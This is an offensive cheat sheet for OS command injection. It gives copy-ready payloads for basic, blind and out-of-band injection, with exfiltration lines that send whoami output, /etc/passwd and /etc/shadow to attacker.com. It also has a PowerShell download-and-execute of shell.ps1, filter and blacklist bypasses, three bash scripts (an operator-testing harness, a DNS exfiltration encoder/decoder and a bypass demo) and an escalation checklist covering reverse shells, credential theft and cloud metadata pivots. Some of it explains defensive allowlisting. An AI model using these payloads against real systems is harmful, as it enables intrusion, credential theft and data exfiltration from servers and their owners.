Command Injection Cheat Sheet: Blind, Out-of-Band, and Filter Bypass (2025)
OS Command Injection lets an attacker execute arbitrary system commands on the server with the privileges of the application process. It falls under Injection (A03) in the OWASP Top 10 2021 and remains one of the most dangerous vulnerability classes: a single exploitable endpoint can hand an attacker the whole host. This cheat sheet covers the techniques from basic detection through blind and out-of-band exploitation to filter bypass.
Command Injection Operators
These metacharacters terminate or chain commands. Which ones work depends on the shell that parses the injected string: sh/bash on Linux, cmd.exe on Windows.
# Works on both Linux (sh/bash) and Windows (cmd.exe)
| (pipe: output of the first command becomes input of the second)
|| (OR: run the second only if the first fails, so it stays silent when the original command succeeds)
& (Linux: start the first command in the background and run the second immediately; Windows: run both in sequence)
&& (AND: run the second only if the first succeeds)
# Linux/Unix shells only
; (command separator; not an operator in cmd.exe)
`command` (backtick command substitution: the command's output is spliced into the original command line)
$(command) (dollar command substitution: same effect, and it nests cleanly)
$((expression)) (arithmetic expansion: evaluates an expression rather than running a command, handy for platform detection, see below)
# Newline
%0a (URL-encoded newline: parsed as a command separator by Unix shells)
Basic Command Injection
When input is passed directly to a system command:
# If the application runs: ping -c 3 [user_input]
; id
| id
|| id
& id
&& id
`id`
$(id)
%0aid
Blind Command Injection
When you don't see the command output in the response, you need alternative detection methods:
Time-Based Detection
# Linux
; sleep 5
| sleep 5
& sleep 5
`sleep 5`
$(sleep 5)
# Windows (ping is the reliable delay: timeout exits immediately when stdin is redirected, which is the usual case for a command spawned by a web app)
& ping -n 6 127.0.0.1 &
| ping -n 6 127.0.0.1
& timeout /t 5 &
If the response is delayed by about 5 seconds, and by about 10 when you change the payload to 10, you've confirmed blind command injection. Always compare against the baseline response time so network jitter is not mistaken for a sleep.
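The cheat sheet's running example is an application that executes `ping -c 3 [user_input]`. Below is an added example, not part of the original cheat sheet, that stands in for such an application: `echo PING` replaces the ping binary so it runs offline (the assumption is that the real application shells out the same way, only the binary differs), and the injected command is `echo INJ''ECTED`, whose output differs from its text, so a match on the output proves execution rather than the payload being echoed back. It runs every operator from the table above, times the blind `sleep` probe, and contrasts the vulnerable wrapper with a hardened one that allowlists the input and passes it as a single argument:

```shell
#!/usr/bin/env bash
# Added example, not from the original cheat sheet: a stand-in for an application
# that builds "ping -c 3 <user_input>" as a shell string, run against each operator
# from the table, plus the time-based blind probe and the hardened version.
# "echo PING" replaces the real ping binary so this runs offline (assumption: the
# application shells out the same way, only the binary differs).

# Injected command whose output is INJECTED but whose text is not, so matching the
# output proves the command ran instead of the payload being echoed back.
INJECT_CMD="echo INJ''ECTED"

# Vulnerable: the input is interpolated into a string that /bin/sh parses.
vuln_ping() {
    sh -c "echo PING -c 3 $1" 2>/dev/null
}

# Hardened: same command, input allowlisted (hostname/IP characters only) and passed
# as one argv element. No shell ever parses it, so every operator is inert.
safe_ping() {
    local host=$1
    [[ $host =~ ^[A-Za-z0-9.-]+$ ]] || return 1
    echo PING -c 3 "$host"
}

# Returns 0 if the payload made the vulnerable wrapper execute the injected command.
injects() {
    vuln_ping "$1" | grep -q INJECTED
}

# Blind detection: returns 0 if the payload delays the response by at least $2
# seconds (default 1). The cheat sheet's probe is "; sleep 5"; shortened here.
delays() {
    local payload=$1 min=${2:-1} start=$SECONDS
    vuln_ping "$payload" >/dev/null
    (( SECONDS - start >= min ))
}

# Try every operator from the table and report which ones inject against this target.
operator_report() {
    local op payload
    for op in ';' '|' '||' '&' '&&' $'\n' '`' '$()'; do
        case $op in
            '`')   payload="127.0.0.1 \`${INJECT_CMD}\`" ;;   # output spliced into the command
            '$()') payload="127.0.0.1 \$(${INJECT_CMD})" ;;
            *)     payload="127.0.0.1 ${op} ${INJECT_CMD}" ;;
        esac
        if [[ $op == $'\n' ]]; then op='%0a'; fi
        if injects "$payload"; then
            echo "$op injects"
        else
            echo "$op silent"
        fi
    done
}
```

Seven of the eight operators inject; `||` stays silent because the original command succeeded, exactly as it would for a reachable host. In a blind test, pair an `||` probe with `&&` or `;`, or make the first command fail on purpose (an unreachable address) before concluding the endpoint is safe. `safe_ping` rejects the same payloads outright, and even an allowed value never reaches a shell.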
DNS-Based Detection (Out-of-Band)
# Linux — trigger DNS lookup to your server
; nslookup attacker.com
; dig attacker.com
; host attacker.com
`nslookup attacker.com`
$(dig attacker.com)
# Windows
& nslookup attacker.com &
# With data exfiltration
; nslookup $(whoami).attacker.com
; dig $(hostname).attacker.com
Use a tool like Burp Collaborator, interactsh, or a custom DNS server to catch the lookup.
HTTP-Based OOB (Out-of-Band)
# Linux
; curl http://attacker.com/$(whoami)
; wget http://attacker.com/$(cat /etc/hostname)
$(curl http://attacker.com/?data=$(id|base64))
# Windows
& certutil -urlcache -split -f http://attacker.com/%USERNAME% &
& powershell -c "Invoke-WebRequest http://attacker.com/$env:USERNAME" &
File-Based Detection
# Write output to a web-accessible file (the user the command runs as needs write access to the web root)
; id > /var/www/html/output.txt
; whoami > /var/www/html/output.txt
# Then access: http://target.com/output.txt (and delete the file when you are done)
Data Exfiltration Techniques
DNS Exfiltration (Stealthy)
# Exfiltrate one word at a time via DNS subdomain. Raw passwd lines contain ':' and '/', which are not valid hostname characters, so some resolvers refuse the lookup; encode first for anything that is not plain alphanumerics
; for line in $(cat /etc/passwd | head -5); do nslookup $line.attacker.com; done
# Hex-encode to handle special characters (base64 is not safe here: '+', '/' and '=' are invalid in DNS labels). A single label holds at most 63 characters
; nslookup $(cat /etc/passwd | xxd -p | tr -d '\n' | head -c 60).attacker.com
HTTP Exfiltration
# POST entire file contents
; curl -X POST -d @/etc/passwd http://attacker.com/exfil
# Base64 encoded (GNU base64; -w0 disables line wrapping. /etc/shadow is readable only by root, so this only works when the injected command runs as root)
; curl http://attacker.com/$(cat /etc/shadow | base64 -w0)
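DNS exfiltration only works if every query name the target sends is a valid hostname. The following added example (not from the original cheat sheet) shows both ends of the channel: `dns_encode` runs on the target and turns arbitrary bytes into hex labels of at most 60 characters with a sequence prefix, and `dns_decode` reassembles the bytes from the captured query names in any order. Hex replaces base64 because `+`, `/` and `=` are not valid label characters, `od` replaces `xxd` because it is POSIX and present on minimal systems, and the sequence prefix also makes every name unique so a caching resolver cannot answer a repeat without forwarding it. attacker.com and the sample passwd lines are constructed for the example:

```shell
#!/usr/bin/env bash
# Added example, not from the original cheat sheet: the encoder an attacker runs on
# the target to turn bytes into DNS-safe query names, and the decoder run against
# the query log on the attacker's DNS server. Hex is used instead of base64 because
# '+', '/' and '=' are not valid hostname characters; labels are capped at 60 of the
# 63 characters RFC 1035 allows; a sequence prefix keeps every name unique and lets
# the receiver restore order. attacker.com and SAMPLE are constructed for the example.

EXFIL_DOMAIN="attacker.com"
LABEL_LEN=60

# Constructed sample "file" standing in for /etc/passwd.
SAMPLE=$'root:x:0:0:root:/root:/bin/bash\nwww-data:x:33:33::/var/www:/usr/sbin/nologin'

# Target side: stdin -> one query name per line, e.g. 0.726f6f743a78....attacker.com
dns_encode() {
    local seq=0 label
    od -An -v -tx1 | tr -d ' \n' | fold -w "$LABEL_LEN" |
    while IFS= read -r label || [ -n "$label" ]; do   # fold may omit the final newline
        printf '%d.%s.%s\n' "$seq" "$label" "$EXFIL_DOMAIN"
        seq=$((seq + 1))
    done
}

# Receiver side: captured names on stdin (any order) -> original bytes on stdout.
dns_decode() {
    local hex
    hex=$(sort -t. -k1,1n | cut -d. -f2 | tr -d '\n')
    # bash's printf %b expands \xHH escapes, turning the hex string back into bytes
    printf '%b' "$(printf '%s' "$hex" | sed 's/../\\x&/g')"
}

# Sanity check: every label must be 1..63 chars of [0-9a-z-] or a resolver may refuse it.
labels_are_valid() {
    local name label parts
    while IFS= read -r name; do
        IFS=. read -ra parts <<< "$name"
        for label in "${parts[@]}"; do
            [[ $label =~ ^[0-9a-z-]{1,63}$ ]] || { echo "bad label: $label" >&2; return 1; }
        done
    done
    return 0
}

# Round-trip the sample, verify the names are valid, and print how many queries it took.
demo() {
    local queries
    queries=$(printf '%s' "$SAMPLE" | dns_encode)
    printf '%s\n' "$queries" | labels_are_valid || return 1
    [ "$(printf '%s\n' "$queries" | dns_decode)" = "$SAMPLE" ] || return 1
    echo $(( $(printf '%s\n' "$queries" | wc -l) ))
}
```

On a target the encoder collapses into the `for ... nslookup` loop shown above, with the same `od | tr | fold` pipeline feeding it; on the receiving side, whatever logs the queries (Burp Collaborator, interactsh, tcpdump, or your own DNS server) just needs to be reduced to one query name per line before it is piped into `dns_decode`.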
Filter Bypass Techniques
Space Bypass
# Linux — many alternatives to spaces
cat${IFS}/etc/passwd
cat$IFS/etc/passwd
{cat,/etc/passwd}
cat</etc/passwd
X=$'cat\x20/etc/passwd'&&$X
# Windows
type%PROGRAMFILES:~10,1%file.txt (extract space from env var)
cmd/c"whoami" (no space needed)
Keyword Bypass
# String concatenation
c'a't /etc/passwd
c"a"t /etc/passwd
c\at /etc/passwd
# Variable insertion
w$()hoami
w$(x)hoami
who$@ami
# Reverse command (imaohw reversed is whoami; wrap in $() so the reversed string is executed, not just printed)
$(echo imaohw | rev)
# Base64 bypass
echo d2hvYW1p | base64 -d | bash
# Hex bypass
echo -e '\x77\x68\x6f\x61\x6d\x69' | bash
Need encoded payloads? Use our Encoder/Decoder to quickly generate Base64, hex, and URL-encoded command strings.
Slash and Path Bypass
# Without forward slash (the first character of $HOME is /)
cat ${HOME:0:1}etc${HOME:0:1}passwd
# Base64-decoded path (L2V0Yy9wYXNzd2Q= is /etc/passwd, so neither the slash nor the filename appears in the payload)
cat $(echo L2V0Yy9wYXNzd2Q= | base64 -d)
# Globbing
cat /e?c/p?ss??
cat /e*c/p*d
Blacklist Bypass
# If 'cat' is blocked
tac /etc/passwd (reverse cat)
nl /etc/passwd (with line numbers)
head /etc/passwd
tail /etc/passwd
less /etc/passwd
more /etc/passwd
sort /etc/passwd
rev /etc/passwd | rev
xxd /etc/passwd
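Why blacklists fail is easiest to see with the filter and the bypass side by side. This added example (not code from the original cheat sheet) defines a naive blacklist that rejects `cat`, `whoami`, spaces and slashes, an application stand-in that runs anything surviving the filter through bash, and the bypasses from the sections above rebuilt against a constructed temp file rather than /etc/passwd. The filter rules are an assumption about what a naive application might block; `${PWD:0:1}` is used as the slash source instead of the sheet's `${HOME:0:1}` because bash always sets PWD while HOME can be unset for service accounts:

```shell
#!/usr/bin/env bash
# Added example, not from the original cheat sheet: a naive blacklist, a stand-in for
# the application that runs filtered input through bash, and the space/keyword/slash
# bypasses rebuilt against a constructed temp file instead of /etc/passwd.
# Assumptions: the filter rules below are an invented worst case of a blacklist, and
# ${PWD:0:1} stands in for the sheet's ${HOME:0:1} because bash always sets PWD.

# Naive blacklist: reject input containing any of these literal strings.
blacklist_filter() {
    case $1 in
        *cat*|*whoami*|*' '*|*/*) return 1 ;;
    esac
    return 0
}

# The vulnerable application: anything that survives the blacklist reaches a shell.
run_filtered() {
    blacklist_filter "$1" || { echo "blocked"; return 1; }
    bash -c "$1" 2>/dev/null
}

# Rewrite an absolute path without slashes: /tmp/x -> ${PWD:0:1}tmp${PWD:0:1}x
slashless() {
    printf '%s' "$1" | sed 's#/#${PWD:0:1}#g'
}

# Four spellings of "cat <path>" containing neither "cat", a space, nor "/":
# quote splitting, $IFS as the space, a backslash in the keyword, and a hex-built
# variable (X=$'\x63\x61\x74\x20'...) executed via unquoted expansion.
bypass_payloads() {
    local p
    p=$(slashless "$1")
    printf '%s\n' \
        "c'a't\${IFS}$p" \
        "c\"a\"t\$IFS$p" \
        "c\\at\${IFS}$p" \
        "X=\$'\\x63\\x61\\x74\\x20'$p&&\$X"
}

# Feed every payload to the filtered app; print how many both passed the blacklist
# and produced the exact contents of the file.
count_successful_bypasses() {
    local file=$1 expected ok=0 payload out
    expected=$(cat "$file")
    while IFS= read -r payload; do
        out=$(run_filtered "$payload") && [ "$out" = "$expected" ] && ok=$((ok + 1))
    done < <(bypass_payloads "$file")
    echo "$ok"
}

# Constructed secret file standing in for /etc/passwd.
SECRET=$(mktemp)
printf 'db_password=constructed-example\n' > "$SECRET"
trap 'rm -f "$SECRET"' EXIT
```

All four spellings of `cat <file>` pass the filter and print the file, and `who$@ami` slips past the `whoami` rule the same way. Extending the blacklist never ends this game, since most of the payloads above rely on nothing but quoting; the fix is an allowlist for the value you actually expect (a hostname, a filename) passed as a single argument and never through a shell.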
Windows-Specific Payloads
# Environment variable substring
%COMSPEC:~-7,1% = c (from C:\WINDOWS\system32\cmd.exe)
# PowerShell obfuscation
powershell -enc [BASE64_ENCODED_COMMAND]
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')"
# CMD tricks (cmd.exe expands %var% when it parses the line, before set runs, so %x%%y% on the same line as the set is still empty; delayed expansion with /V:ON and !var! is what makes this work)
cmd /V:ON /C "set x=who&&set y=ami&&!x!!y!"
cmd /V:ON /C "set cmd=whoami&&!cmd!"
Platform Detection
# Determine if target is Linux or Windows
; echo $((1+1)) -> 2 (Linux — bash arithmetic)
& set /a 1+1 -> 2 (Windows — cmd.exe)
# Linux confirmation
; uname -a
; cat /etc/os-release
# Windows confirmation
& ver
& systeminfo
Escalating Command Injection
- Confirm with whoami/id — know what user you're running as
- Upgrade to interactive shell — use our Reverse Shell Generator to get a proper shell
- Enumerate the system — check for privilege escalation vectors
- Exfiltrate sensitive data — database configs, API keys, credentials
- Pivot internally — scan the internal network and query the cloud metadata service directly with curl (for example http://169.254.169.254/ on AWS, Azure and GCP); with command execution you do not need SSRF to reach it
Generate command injection payloads with operator variations, encoding, and filter bypasses using our Command Injection Generator. Combine with the WAF Bypass Generator to evade web application firewalls.
For a complete payload reference, visit the Command Injection Cheat Sheet with 80+ copy-ready payloads organized by technique and platform.